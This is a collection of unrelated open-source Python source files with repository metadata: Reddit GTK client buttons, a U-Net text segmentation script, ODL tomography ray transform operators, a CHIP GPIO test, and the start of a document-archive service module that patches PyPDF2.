        if self._data.get('gilded', 0) > 0:
            gold = '★{} '.format(self._data.get('gilded'))
            gold_label = Gtk.Label(label=gold)
            gold_label.get_style_context().add_class('gilded')
            make_label_shrinkable(gold_label)
            label = self._button.get_child()
            self._button.remove(label)
            box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
            box.add(gold_label)
            box.add(label)
            self._button.add(box)
            box.show_all()
class AuthorButtonBehaviour():
    '''Show an item's author on a button, with optional MOD/ADM/SP,
    OP and flair badges, opening the author's page when clicked.
    '''
    def __init__(self, button, data, original_poster=None,
                 show_flair=False):
        button.props.label = data['author']
        button.connect('clicked', self.__name_clicked_cb)
        distinguished = data['distinguished']
        author_is_op = data['author'] == original_poster
        flair_text = data['author_flair_text'] if show_flair else None
        make_label_shrinkable(button.get_child())
        # Without any badge to show, the plain label is enough.
        if distinguished is None and not author_is_op and flair_text is None:
            return
        # Re-pack the name label into a box alongside the badges.
        name_label = button.get_child()
        button.remove(name_label)
        row = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
        if distinguished is not None:
            abbrev = {
                'moderator': 'MOD',
                'admin': 'ADM',
                'special': 'SP'
            }[distinguished]
            row.add(self._badge(abbrev, distinguished))
        if author_is_op:
            row.add(self._badge('OP', 'op'))
        row.add(name_label)
        if flair_text is not None:
            row.add(self._badge(flair_text, 'flair'))
        button.add(row)
        row.show_all()
    @staticmethod
    def _badge(text, style_class):
        # Build one small, shrinkable, styled badge label.
        badge = Gtk.Label(label=text)
        badge.get_style_context().add_class(style_class)
        make_label_shrinkable(badge)
        return badge
    def __name_clicked_cb(self, button):
        window = button.get_toplevel()
        window.goto_sublist('/u/{}/'.format(button.props.label))
class SubButtonBehaviour():
    '''Make a button show the item's subreddit and open it on click.'''
    def __init__(self, button, data):
        button.props.label = data['subreddit']
        button.connect('clicked', self.__clicked_cb)
        make_label_shrinkable(button.get_child())
    def __clicked_cb(self, button):
        toplevel = button.get_toplevel()
        toplevel.goto_sublist('/r/{}'.format(button.props.label))
class TimeButtonBehaviour():
    '''Show a humanized creation time on a button, with a detail
    popover attached.
    '''
    def __init__(self, button, data):
        self.data = data
        created = arrow.get(self.data['created_utc'])
        button.props.label = created.humanize()
        self._p = connect_palette(button, self._make_time_palette,
                                  modalify=True)
        make_label_shrinkable(button.get_child())
    def _make_time_palette(self):
        palette = _TimePalette(self.data)
        palette.get_child().show_all()
        return palette
class _TimePalette(Gtk.Popover):
    '''Popover listing created/edited timestamps and a permalink.'''
    def __init__(self, data, **kwargs):
        Gtk.Popover.__init__(self, **kwargs)
        container = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
        self.add(container)
        container.show()
        created = arrow.get(data['created_utc'])
        text_lines = ['Created {} ({})'.format(
            created.format('hh:mm a, MMM YY'), created.humanize())]
        # 'edited' is False/True/timestamp; True means the edit time
        # is unknown.
        edited = data.get('edited')
        if edited is True:
            text_lines.append('Edited ages ago')
        elif edited:
            when = arrow.get(edited)
            text_lines.append('Edited {} ({})'.format(
                when.format('hh:mm a, MMM YY'), when.humanize()))
        info = Gtk.Label(label='\n'.join(text_lines))
        container.add(info)
        info.show()
        link = Gtk.LinkButton(
            uri='https://www.reddit.com' + self._permalink_path(data),
            label='Permalink in External Browser')
        container.add(link)
        link.show()
    @staticmethod
    def _permalink_path(data):
        # Work out the site-relative permalink for a post or a comment.
        if data.get('permalink') is not None:
            return data['permalink']
        if data.get('link_id') is not None:
            return '/r/{}/comments/{}//{}'.format(
                data['subreddit'], data['link_id'][len('t3_'):], data['id'])
        return '/r/{}/comments/{}'.format(
            data['subreddit'], data['id'])
class SubscribeButtonBehaviour():
    '''Wire a toggle button to subscribe/unsubscribe from a subreddit.'''
    def __init__(self, api: RedditAPI, button, subreddit_name):
        self._api = api
        self._button = button
        self._subreddit_name = subreddit_name
        # Initial state reflects the user's current subscriptions.
        sub_path = '/r/{}/'.format(subreddit_name.lower())
        self._button.props.active = sub_path in self._api.lower_user_subs
        self._button.connect('toggled', self.__toggled_cb)
        self._set_label()
    def _set_label(self):
        if self._button.props.active:
            self._button.props.label = 'Subscribed'
        else:
            self._button.props.label = 'Subscribe'
        make_label_shrinkable(self._button.get_child())
    def __toggled_cb(self, toggle):
        # Disable the button while the request is in flight; the
        # callback re-enables it and sets the final label.
        active = self._button.props.active
        self._button.props.label = ('Subscribing...' if active
                                    else 'Unsubscribing...')
        self._button.props.sensitive = False
        self._api.set_subscribed(self._subreddit_name, active,
                                 self.__subscribe_cb)
    def __subscribe_cb(self, j):
        self._button.props.sensitive = True
        self._set_label()
        self._api.update_subscriptions()
|
samdroid-apps/something-for-reddit
|
redditisgtk/buttons.py
|
Python
|
gpl-3.0
| 9,564
|
from ImportModel import load_unet
import numpy as np
from PIL import Image
from os.path import join
import matplotlib.pyplot as plt
import cv2
# Side length, in pixels, of the square tiles fed to the network.
dim = 512
# Load the segmentation U-Net once at import time.
# NOTE(review): this reads 'text_segmentation.h5' from the current
# working directory on import — confirm that is intended.
unet = load_unet(input_shape=(dim, dim, 3), weight_path='text_segmentation.h5')
def segment_im(im, dim=dim):
    """Segment an image into a binary mask, tile by tile.

    Returns a tuple ``(segmentation, padded_im)``: the post-processed
    uint8 mask and the zero-padded uint8 copy of the input, both sized
    up to the next multiple of ``dim`` in each dimension.

    Assumes ``im`` is a (rows, cols, 3) uint8-like array — TODO confirm
    against callers.
    """
    def postprocess(im):
        # Threshold the network output at 0.1, then invert and scale to
        # 0/255. NOTE(review): values exactly equal to 0.1 are left
        # unchanged by these two masked assignments.
        im[im < 0.1] = 0
        im[im > 0.1] = 1
        im = np.abs(im - 1) * 255
        im = im.astype('uint8')
        # Morphological opening removes small speckles from the mask.
        kernel = np.ones((10, 10), np.uint8)
        im = cv2.morphologyEx(im, cv2.MORPH_OPEN, kernel)
        return im
    # NOTE(review): these are actually (rows, cols) of the array.
    width, height = im.shape[:2]
    # Pad up to whole tiles and rescale pixel values to roughly [-1, 1).
    new_im = np.zeros(((width // dim + 1) * dim, (height // dim + 1) * dim, 3))
    new_im[:width, :height] = im / 128 - 1
    segmentation = np.zeros((new_im.shape[0], new_im.shape[1], 1))
    # Run the network on each dim x dim tile independently.
    for i in range(new_im.shape[0] // dim):
        for j in range(new_im.shape[1] // dim):
            i_slice = slice(i * dim, (i + 1) * dim)
            j_slice = slice(j * dim, (j + 1) * dim)
            sample = np.expand_dims(new_im[i_slice, j_slice], axis=0)
            segmentation[i_slice, j_slice] = unet.predict(sample)[0]
    segmentation = postprocess(segmentation)
    # Undo the [-1, 1) scaling to return a displayable uint8 image.
    return segmentation, ((new_im+1)*128).astype('uint8')
def get_components(im, segmented):
    '''Crop one thumbnail from ``im`` per connected component of the
    binary mask ``segmented`` (4-connectivity).
    '''
    _, _, stats, _ = cv2.connectedComponentsWithStats(segmented, 4, cv2.CV_8U)
    # stats[0] describes the background component, so skip it; each
    # remaining row is (left, top, width, height, area).
    return [im[top:top + height, left:left + width]
            for left, top, width, height, _ in stats[1:]]
if __name__ == '__main__':
    # Demo: segment one sample image, save each detected component as a
    # thumbnail, then show the input next to the binary mask.
    im = np.array(Image.open(join('data', 'x', 'plouzane_1.jpg')))
    segmented, new_im = segment_im(im)
    thumbs = get_components(new_im, segmented)
    print('number of thumbs', len(thumbs))
    for i, thumb in enumerate(thumbs):
        thumb = Image.fromarray(thumb)
        # NOTE(review): assumes data/thumbs already exists.
        thumb.save(join('data', 'thumbs', f'{i}.png'))
    plt.subplot(1, 2, 1)
    plt.imshow(im)
    plt.subplot(1, 2, 2)
    plt.imshow(segmented, cmap="gray")
    plt.show()
|
Rignak/Scripts-Python
|
DeepLearning/_Others/OCR/in2thumb.py
|
Python
|
gpl-3.0
| 1,989
|
# Copyright 2014-2016 The ODL development group
#
# This file is part of ODL.
#
# ODL is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ODL is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ODL. If not, see <http://www.gnu.org/licenses/>.
"""Ray transforms."""
# Imports for common Python 2/3 codebase
from __future__ import print_function, division, absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import str, super
import numpy as np
from odl.discr import DiscreteLp
from odl.operator import Operator
from odl.space import FunctionSpace
from odl.tomo.geometry import Geometry, Parallel2dGeometry
from odl.tomo.backends import (
ASTRA_AVAILABLE, ASTRA_CUDA_AVAILABLE, SCIKIT_IMAGE_AVAILABLE,
astra_cpu_forward_projector, astra_cpu_back_projector,
AstraCudaProjectorImpl, AstraCudaBackProjectorImpl,
scikit_radon_forward, scikit_radon_back_projector)
_SUPPORTED_IMPL = ('astra_cpu', 'astra_cuda', 'scikit')
__all__ = ('RayTransform', 'RayBackProjection')
# TODO: DivergentBeamTransform?
class RayTransform(Operator):
    """Discrete Ray transform between L^p spaces."""
    def __init__(self, discr_domain, geometry, **kwargs):
        """Initialize a new instance.
        Parameters
        ----------
        discr_domain : `DiscreteLp`
            Discretized space, the domain of the forward projector
        geometry : `Geometry`
            Geometry of the transform, containing information about
            the operator range
        Other Parameters
        ----------------
        impl : {`None`, 'astra_cuda', 'astra_cpu', 'scikit'}, optional
            Implementation back-end for the transform. Supported back-ends:
            * ``'astra_cuda'``: ASTRA toolbox, using CUDA, 2D or 3D
            * ``'astra_cpu'``: ASTRA toolbox using CPU, only 2D
            * ``'scikit'``: scikit-image, only 2D parallel with square domain
            If ``None`` is given, the fastest available back-end is used.
        interp : {'nearest', 'linear'}
            Interpolation type for the discretization of the operator
            range.
            Default: 'nearest'
        discr_range : `DiscreteLp`
            Discretized space, the range of the forward projector.
            Default: Inferred from parameters.
        use_cache : bool
            If ``True``, data is cached. Note that this causes notable memory
            overhead, both on the GPU and on the CPU since a full volume and
            projection is stored. In the 3D case, some users may want to
            disable this.
            Default: True
        Notes
        -----
        The ASTRA backend is faster if data is given with ``dtype`` 'float32'
        and storage order 'C'. Otherwise copies will be needed.
        """
        if not isinstance(discr_domain, DiscreteLp):
            raise TypeError('`discr_domain` {!r} is not a `DiscreteLp`'
                            ' instance'.format(discr_domain))
        if not isinstance(geometry, Geometry):
            raise TypeError('`geometry` {!r} is not a `Geometry` instance'
                            ''.format(geometry))
        impl = kwargs.pop('impl', None)
        if impl is None:
            # Select fastest available
            if ASTRA_CUDA_AVAILABLE:
                impl = 'astra_cuda'
            elif ASTRA_AVAILABLE:
                impl = 'astra_cpu'
            elif SCIKIT_IMAGE_AVAILABLE:
                impl = 'scikit'
            else:
                raise ValueError('no valid `impl` installed')
        impl, impl_in = str(impl).lower(), impl
        if impl not in _SUPPORTED_IMPL:
            raise ValueError('`impl` {!r} not supported'
                             ''.format(impl_in))
        self.use_cache = kwargs.pop('use_cache', True)
        # TODO: sanity checks between impl and discretization impl
        if impl.startswith('astra'):
            # TODO: these should be moved somewhere else
            if not ASTRA_AVAILABLE:
                raise ValueError("'astra' back-end not available")
            if impl == 'astra_cuda' and not ASTRA_CUDA_AVAILABLE:
                raise ValueError("'astra_cuda' back-end not available")
            # Use the same tolerances as `RayBackProjection` so that the
            # forward operator and its adjoint accept the same domains.
            if not np.allclose(discr_domain.partition.cell_sides[1:],
                               discr_domain.partition.cell_sides[:-1],
                               atol=0, rtol=1e-5):
                raise ValueError('ASTRA does not support different voxel '
                                 'sizes per axis, got {}'
                                 ''.format(discr_domain.partition.cell_sides))
            if geometry.ndim > 2 and impl.endswith('cpu'):
                # Report the dimension, not the full geometry repr.
                raise ValueError('`impl` {}, only works for 2d geometries'
                                 ' got {}-d'.format(impl_in, geometry.ndim))
        elif impl == 'scikit':
            if not isinstance(geometry, Parallel2dGeometry):
                raise TypeError("'scikit' backend only supports 2d parallel "
                                'geometries')
            mid_pt = discr_domain.domain.mid_pt
            if not all(mid_pt == [0, 0]):
                raise ValueError('`discr_domain.domain` needs to be '
                                 'centered on [0, 0], got {}'.format(mid_pt))
            shape = discr_domain.shape
            if shape[0] != shape[1]:
                raise ValueError('`discr_domain.shape` needs to be square '
                                 'got {}'.format(shape))
            extent = discr_domain.domain.extent()
            if extent[0] != extent[1]:
                raise ValueError('`discr_domain.extent` needs to be square '
                                 'got {}'.format(extent))
        # TODO: sanity checks between domain and geometry (ndim, ...)
        self.__geometry = geometry
        self.__impl = impl
        # NOTE: kwargs is stored by reference; the pop below also
        # removes 'discr_range' from self.kwargs, which is what
        # `adjoint` relies on when forwarding the remaining kwargs.
        self.kwargs = kwargs
        discr_range = kwargs.pop('discr_range', None)
        if discr_range is None:
            dtype = discr_domain.dspace.dtype
            # Create a discretized space (operator range) with the same
            # data-space type as the domain.
            # TODO: use a ProductSpace structure or find a way to treat
            # different dimensions differently in DiscreteLp
            # (i.e. in partitions).
            range_uspace = FunctionSpace(geometry.params,
                                         out_dtype=dtype)
            # Approximate cell volume
            # TODO: angles and detector must be handled separately. While the
            # detector should be uniformly discretized, the angles do not have
            # to and often are not.
            extent = float(geometry.partition.extent().prod())
            size = float(geometry.partition.size)
            weight = extent / size
            range_dspace = discr_domain.dspace_type(geometry.partition.size,
                                                    weighting=weight,
                                                    dtype=dtype)
            if geometry.ndim == 2:
                axis_labels = ['$\\theta$', '$s$']
            elif geometry.ndim == 3:
                axis_labels = ['$\\theta$', '$u$', '$v$']
            else:
                # TODO Add this when we add nd ray transform.
                axis_labels = None
            range_interp = kwargs.get('interp', 'nearest')
            discr_range = DiscreteLp(
                range_uspace, geometry.partition, range_dspace,
                interp=range_interp, order=discr_domain.order,
                axis_labels=axis_labels)
        self.backproj = None
        super().__init__(discr_domain, discr_range, linear=True)
    @property
    def impl(self):
        """Implementation back-end for evaluation of this operator."""
        return self.__impl
    @property
    def geometry(self):
        """Geometry of this operator."""
        return self.__geometry
    def _call(self, x, out=None):
        """Forward project ``x`` and store the result in ``out`` if given."""
        if self.impl.startswith('astra'):
            backend, data_impl = self.impl.split('_')
            if data_impl == 'cpu':
                return astra_cpu_forward_projector(x, self.geometry,
                                                   self.range, out)
            elif data_impl == 'cuda':
                # Create the CUDA projector lazily and keep it for
                # subsequent calls.
                proj = getattr(self, 'astra_projector', None)
                if proj is None:
                    self.astra_projector = AstraCudaProjectorImpl(
                        self.geometry, self.domain, self.range,
                        use_cache=self.use_cache)
                return self.astra_projector.call_forward(x, out)
            else:
                # Should never happen
                raise RuntimeError('implementation info is inconsistent')
        elif self.impl == 'scikit':
            return scikit_radon_forward(x, self.geometry, self.range, out)
        else:  # Should never happen
            raise RuntimeError('implementation info is inconsistent')
    @property
    def adjoint(self):
        """Adjoint of this operator.
        Returns
        -------
        adjoint : `RayBackProjection`
        """
        # The back-projector is created once and cached.
        if self.backproj is not None:
            return self.backproj
        kwargs = self.kwargs.copy()
        kwargs['discr_domain'] = self.range
        self.backproj = RayBackProjection(self.domain, self.geometry,
                                          impl=self.impl,
                                          use_cache=self.use_cache,
                                          **kwargs)
        return self.backproj
class RayBackProjection(Operator):
    """Adjoint of the discrete Ray transform between L^p spaces."""
    def __init__(self, discr_range, geometry, **kwargs):
        """Initialize a new instance.
        Parameters
        ----------
        discr_range : `DiscreteLp`
            Reconstruction space, the range of the back-projector
        geometry : `Geometry`
            The geometry of the transform, contains information about
            the operator domain
        Other Parameters
        ----------------
        impl : {'astra_cpu', 'astra_cuda', 'scikit'}, optional
            Implementation back-end for the transform. Supported back-ends:
            * ``'astra_cuda'``: ASTRA toolbox, using CUDA, 2D or 3D
            * ``'astra_cpu'``: ASTRA toolbox using CPU, only 2D
            * ``'scikit'``: scikit-image, only 2D parallel with square domain
            If ``None`` is given, the fastest available back-end is used.
        interp : {'nearest', 'linear'}
            Interpolation type for the discretization of the operator range.
            Default: 'nearest'
        discr_domain : `DiscreteLp`
            Discretized space, the range of the forward projector.
            Default: Inferred from parameters.
        use_cache : bool
            If ``True``, data is cached. Note that this causes notable memory
            overhead, both on the GPU and on the CPU since a full volume and
            projection is stored. In the 3D case, some users may want to
            disable this.
        """
        if not isinstance(discr_range, DiscreteLp):
            raise TypeError('`discr_range` {!r} is not a `DiscreteLp`'
                            ' instance'.format(discr_range))
        if not isinstance(geometry, Geometry):
            raise TypeError('`geometry` {!r} is not a `Geometry` instance'
                            ''.format(geometry))
        impl = kwargs.pop('impl', None)
        if impl is None:
            # Select fastest available
            if ASTRA_CUDA_AVAILABLE:
                impl = 'astra_cuda'
            elif ASTRA_AVAILABLE:
                impl = 'astra_cpu'
            elif SCIKIT_IMAGE_AVAILABLE:
                impl = 'scikit'
            else:
                raise ValueError('no valid `impl` installed')
        # Keep the user's original spelling for the error message.
        impl, impl_in = str(impl).lower(), impl
        if impl not in _SUPPORTED_IMPL:
            raise ValueError("`impl` '{}' not supported"
                             ''.format(impl_in))
        if impl.startswith('astra'):
            if not ASTRA_AVAILABLE:
                raise ValueError("'astra' backend not available")
            if impl == 'astra_cuda' and not ASTRA_CUDA_AVAILABLE:
                raise ValueError("'astra_cuda' backend not available")
            # ASTRA requires isotropic voxels: compare each axis' cell size
            # to its neighbor's.
            if not np.allclose(discr_range.partition.cell_sides[1:],
                               discr_range.partition.cell_sides[:-1],
                               atol=0, rtol=1e-5):
                raise ValueError('ASTRA does not support different voxel '
                                 'sizes per axis, got {}'
                                 ''.format(discr_range.partition.cell_sides))
        self.use_cache = kwargs.pop('use_cache', True)
        self.__geometry = geometry
        self.__impl = impl
        # NOTE(review): ``self.kwargs`` aliases ``kwargs``, so the pop()
        # below also removes 'discr_domain' from ``self.kwargs``. This looks
        # intentional (``adjoint`` inserts its own 'discr_range' instead) --
        # confirm before changing.
        self.kwargs = kwargs
        discr_domain = kwargs.pop('discr_domain', None)
        if discr_domain is None:
            dtype = discr_range.dspace.dtype
            # Create a discretized space (operator domain) with the same
            # data-space type as the range.
            domain_uspace = FunctionSpace(geometry.params, out_dtype=dtype)
            # Approximate cell volume, used as the integration weight.
            extent = float(geometry.partition.extent().prod())
            size = float(geometry.partition.size)
            weight = extent / size
            domain_dspace = discr_range.dspace_type(geometry.partition.size,
                                                    weighting=weight,
                                                    dtype=dtype)
            if geometry.ndim == 2:
                axis_labels = ['$\\theta$', '$s$']
            elif geometry.ndim == 3:
                axis_labels = ['$\\theta$', '$u$', '$v$']
            else:
                # TODO Add this when we add nd ray transform.
                axis_labels = None
            domain_interp = kwargs.get('interp', 'nearest')
            discr_domain = DiscreteLp(
                domain_uspace, geometry.partition, domain_dspace,
                interp=domain_interp, order=discr_range.order,
                axis_labels=axis_labels)
        # Cache slot for the lazily created adjoint (see ``adjoint`` below).
        self.ray_trafo = None
        super().__init__(discr_domain, discr_range, linear=True)
    @property
    def impl(self):
        """Implementation back-end for evaluation of this operator."""
        return self.__impl
    @property
    def geometry(self):
        """Geometry of this operator."""
        return self.__geometry
    def _call(self, x, out=None):
        """Back-project ``x`` and store the result in ``out`` if given."""
        if self.impl.startswith('astra'):
            backend, data_impl = self.impl.split('_')
            if data_impl == 'cpu':
                return astra_cpu_back_projector(x, self.geometry,
                                                self.range, out)
            elif data_impl == 'cuda':
                # Create the CUDA back-projector lazily and reuse it.
                backproj = getattr(self, 'astra_backprojector', None)
                if backproj is None:
                    self.astra_backprojector = AstraCudaBackProjectorImpl(
                        self.geometry, self.range, self.domain,
                        use_cache=self.use_cache)
                return self.astra_backprojector.call_backward(x, out)
            else:
                # Should never happen
                raise RuntimeError('implementation info is inconsistent')
        elif self.impl == 'scikit':
            return scikit_radon_back_projector(x, self.geometry,
                                               self.range, out)
        else:  # Should never happen
            raise RuntimeError('implementation info is inconsistent')
    @property
    def adjoint(self):
        """Adjoint of this operator.
        Returns
        -------
        adjoint : `RayTransform`
        """
        if self.ray_trafo is not None:
            return self.ray_trafo
        # Pass the remaining construction kwargs on to the forward operator,
        # replacing the discretized range with our domain.
        kwargs = self.kwargs.copy()
        kwargs['discr_range'] = self.domain
        self.ray_trafo = RayTransform(self.range, self.geometry,
                                      impl=self.impl,
                                      use_cache=self.use_cache,
                                      **kwargs)
        return self.ray_trafo
if __name__ == '__main__':
    # pylint: disable=wrong-import-position
    # Run the module's doctests when the file is executed directly.
    from odl.util.testutils import run_doctests
    run_doctests()
|
bgris/ODL_bgris
|
lib/python3.5/site-packages/odl/tomo/operators/ray_trafo.py
|
Python
|
gpl-3.0
| 16,832
|
#!/usr/bin/python
# Minimal GPIO smoke test for the NTC CHIP board: drives pin XIO-P0 low
# via Adafruit_GPIO. The commented-out lines below are earlier experiments
# (CSID1 -> XIO-P1 and XIO-P0 -> XIO-P1 loopback tests) kept for reference.
# NOTE(review): per the comments below, gpio access required sudo.
import Adafruit_GPIO as GPIO
import time, os
#print "GETTING GPIO OBJECT"
gpio = GPIO.get_platform_gpio()
#print "SETUP CSID1"
#gpio.setup("CSID1", GPIO.OUT)
#print os.path.exists('/sys/class/gpio/gpio133')
#print "SETUP XIO-P1"
#gpio.setup("XIO-P1", GPIO.IN)
#GPIO.setup("U14_13", GPIO.IN)
#print "READING XIO-P1"
#print "HIGH", gpio.input("XIO-P1")
#gpio.output("CSID1", GPIO.LOW)
#time.sleep(1)
#print "LOW", gpio.input("XIO-P1")
#gpio.output("CSID1", GPIO.HIGH)
#print "HIGH", gpio.input("XIO-P1")
#gpio.output("CSID1", GPIO.LOW)
#print "LOW", gpio.input("XIO-P1")
#this example will test out CHIP XIO-P0 in to XIO-P1
#jumper the pins to test
#
#my test required sudo to work, gpio access requires sudo before changing permissions
#gpio.setup("XIO-P0", GPIO.OUT)
#gpio.setup("XIO-P1", GPIO.IN)
#print "LOW", gpio.input("XIO-P0")
#print "LOW", gpio.input("XIO-P1")
#gpio.output("XIO-P0", GPIO.HIGH)
#print "LOW", gpio.input("XIO-P0")
#print "LOW", gpio.input("XIO-P1")
#time.sleep(4)
#gpio.output("XIO-P0", GPIO.LOW)
#print "LOW", gpio.input("XIO-P0")
#print "LOW", gpio.input("XIO-P1")
#print "CLEANUP"
#gpio.cleanup()
# Active part of the script: configure XIO-P0 as output and drive it low.
gpio.setup("XIO-P0", GPIO.OUT)
gpio.output("XIO-P0", GPIO.LOW)
|
fantoms/psychic-octo-spork
|
chipenable.py
|
Python
|
gpl-3.0
| 1,216
|
'''
Created on 07.02.2018
@author: michael
'''
import codecs
import logging
import os
import re
import shutil
import struct
import sys
import tempfile
from _io import BytesIO
from math import ceil
from subprocess import call
from injector import inject, provider, ClassProvider, singleton, Module
from PIL import ImageFont, ImageDraw, Image
from PyPDF2.generic import DictionaryObject, readObject
from PyPDF2.merger import PdfFileMerger
from PyPDF2.pdf import ContentStream, PdfFileReader
from PyPDF2.utils import readNonWhitespace, b_, PdfReadError
from reportlab.platypus.paragraph import Paragraph
from reportlab.lib.styles import ParagraphStyle
from reportlab.platypus.doctemplate import SimpleDocTemplate
from reportlab.lib.pagesizes import A4
from reportlab.lib.units import cm, inch
from reportlab.platypus.flowables import Image as PdfImage
from sqlalchemy.sql.expression import text, update, select
from alexandriabase import _, baseinjectorkeys, fontdir
from alexandriabase.base_exceptions import NoSuchEntityException
from alexandriabase.daos import CURRENT_VERSION, REGISTRY_TABLE, CreatorDao,\
DocumentFileInfoDao, DocumentDao, DocumentTypeDao, EventDao,\
EventCrossreferencesDao, EventTypeDao, DocumentEventRelationsDao
from alexandriabase.domain import PaginatedResult, Document, Tree, EventType,\
EventTypeIdentifier, Event
# Patching PyPDF2
# pylint: disable=wrong-import-order
# pylint: disable=ungrouped-imports
from PyPDF2 import utils
from sqlalchemy.engine.base import Engine
from alexandriabase.config import Config
def read_inline_image_patch(self, stream):
    '''
    Overrides the _readInlineImage method in the
    ContentStream class to speed up data reading.

    Returns a dict with the image ``settings`` dictionary and the raw
    image ``data`` bytes.
    '''
    # begin reading just after the "BI" - begin image
    # first read the dictionary of settings.
    settings = DictionaryObject()
    while True:
        tok = readNonWhitespace(stream)
        stream.seek(-1, 1)
        if tok == b_("I"):
            # "ID" - begin of image data
            break
        key = readObject(stream, self.pdf)
        tok = readNonWhitespace(stream)
        stream.seek(-1, 1)
        value = readObject(stream, self.pdf)
        settings[key] = value
    # left at beginning of ID
    tmp = stream.read(3)
    assert tmp[:2] == b_("ID")
    # pylint: disable=protected-access
    # BUGFIX: the buffered reader is installed on ContentStream under the
    # name '_readImageDataFast' (see the patch assignment below in this
    # module); the original code called the misspelled
    # '_readImagaDataFast', which raised AttributeError for every
    # inline image.
    data = self._readImageDataFast(stream)
    return {"settings": settings, "data": data}
def read_imaga_data_fast(self, stream):
    '''
    Buffered reading of image data. The unpatched version
    did read byte by byte which is incredible slow on large
    images.

    Installed on ContentStream as ``_readImageDataFast`` by the patch
    assignments below in this module.
    '''
    # pylint: disable=unused-argument
    # We keep more than buffersize bytes in the buffer because the
    # end of image sequence might overlap. So we search some data twice,
    # but this is still far more effective than the old algorithm
    buffersize = 1024 * 1024 # Extracting in megabyte chunks
    buffertail = 256
    # Group 1: image data, group 2: the "EI" end-of-image marker.
    regex = re.compile(b_("(.*?)(EI\\s+)Q\\s+"), re.DOTALL)
    data = b_("")
    buffer = stream.read(buffersize+buffertail)
    end_of_image = False
    while not end_of_image:
        match = regex.match(buffer)
        if match:
            data += buffer[:len(match.group(1))]
            # Rewind so the stream position is just past the matched
            # "EI" sequence (start of buffer + len(group 1) + len(group 2)).
            stream.seek(-1 * (len(buffer) - len(match.group(1)) - len(match.group(2))), 1)
            end_of_image = True
        else:
            if len(buffer) < buffersize + buffertail: # We already have exhausted the stream
                raise utils.PdfReadError("Didn't find end of image marker!")
            # Keep the trailing ``buffertail`` bytes so a marker split
            # across chunk boundaries is still found.
            data += buffer[:buffersize]
            buffer = buffer[buffersize:] + stream.read(buffersize)
    return data
#pylint: disable=protected-access
# Install the optimized implementations on PyPDF2's ContentStream class.
ContentStream._readInlineImage = read_inline_image_patch
ContentStream._readImageDataFast = read_imaga_data_fast
# End of patching PyPDF2
class UnsupportedFileFormat(Exception):
    '''
    Raised when the given file format is not
    supported.
    Argument:
        file_format The offending format
    '''

    def __init__(self, file_format):
        # Chain to Exception so args/str()/logging show the offending
        # format (the original suppressed super-init-not-called instead).
        super().__init__(file_format)
        # The unsupported file type, e.g. 'bmp'.
        self.file_format = file_format
class UnsupportedFileResolution(Exception):
    '''
    Raised, when the fileformat is supported,
    but not with this resolution.
    '''

    def __init__(self, file_format, resolution):
        # Chain to Exception so args/str()/logging are populated
        # (the original suppressed super-init-not-called instead).
        super().__init__(file_format, resolution)
        self.file_format = file_format
        # One uniform resolution is exposed for both axes; the mismatched
        # case is handled by the DifferentXAndYResolutions subclass.
        self.x_resolution = resolution
        self.y_resolution = resolution
class DifferentXAndYResolutions(UnsupportedFileResolution):
    '''
    Raised, when the x resolution does not match the
    y resolution.
    '''

    def __init__(self, x_resolution, y_resolution):
        # Initialize Exception directly (not the parent), because the
        # parent constructor assumes a single resolution for both axes.
        Exception.__init__(self, x_resolution, y_resolution)
        # No single file format is known in this error situation.
        self.file_format = None
        self.x_resolution = x_resolution
        self.y_resolution = y_resolution
def get_graphic_file_resolution(file):
    '''
    Gets the resolution from the info property of a PIL image.

    Returns None when the image carries no dpi information and raises
    DifferentXAndYResolutions when the horizontal and vertical
    resolutions disagree.
    '''
    image = Image.open(file)
    file_info = image.info
    # Idiom fix: use "'dpi' not in" instead of "not 'dpi' in".
    if 'dpi' not in file_info:
        return None
    x_res = file_info['dpi'][0]
    y_res = file_info['dpi'][1]
    # In newer versions of Pillow the resolution
    # is an object of type IFDRational that is
    # not simply comparable - equality checks for identity
    if "%s" % x_res != "%s" % y_res:
        raise DifferentXAndYResolutions(x_res, y_res)
    return x_res
def get_gif_file_resolution(file):
    # pylint: disable=unused-argument
    '''
    Gifs nominally carry 72 dpi. The first alexandria implementation,
    however, scanned at 300 dpi and converted straight to gif, so the
    project's gif files are really 300 dpi scans.
    '''
    legacy_scan_resolution = 300
    return legacy_scan_resolution
class BaseRecordService():
    '''
    Common base class for record services.

    Wraps a record dao and a matching filter expression builder and
    mostly delegates record navigation and persistence to the dao.
    '''
    def __init__(self, dao, filter_expression_builder):
        '''
        Stores the record dao and the dao specific filter
        expression builder.
        '''
        self.dao = dao
        self.filter_expression_builder = filter_expression_builder
    def get_by_id(self, object_id):
        '''
        Delegates to the dao.
        '''
        return self.dao.get_by_id(object_id)
    def get_first(self, filter_expression):
        '''
        Delegates to the dao.
        '''
        return self.dao.get_first(filter_expression)
    def get_next(self, entity, filter_expression):
        '''
        Delegates to the dao.
        '''
        return self.dao.get_next(entity, filter_expression)
    def get_previous(self, entity, filter_expression):
        '''
        Delegates to the dao.
        '''
        return self.dao.get_previous(entity, filter_expression)
    def get_last(self, filter_expression):
        '''
        Delegates to the dao.
        '''
        return self.dao.get_last(filter_expression)
    def get_nearest(self, entity_id, filter_expression):
        '''
        Delegates to the dao.
        '''
        return self.dao.get_nearest(entity_id, filter_expression)
    def create_filter_expression(self, filter_object):
        '''
        Builds a filter expression from the dao specific filter object.
        '''
        return self.filter_expression_builder.create_filter_expression(filter_object)
    def save(self, entity):
        '''
        Delegates to the dao.
        '''
        return self.dao.save(entity)
    def delete(self, entity):
        '''
        Deletes the entity through the dao (keyed by its id).
        '''
        self.dao.delete(entity.id)
    def find(self, condition, page, page_size):
        '''
        Finds entities matching the condition and wraps them together
        with paging information into a PaginatedResult.
        '''
        result = PaginatedResult()
        result.page = page
        result.page_size = page_size
        entity_count = self.dao.get_count(condition)
        result.number_of_pages = ceil((entity_count * 1.0) / page_size)
        result.entities = self.dao.find(condition, page, page_size)
        return result
@singleton
class CreatorService(object):
    '''
    Service to manage the creators in the database.
    '''
    @inject
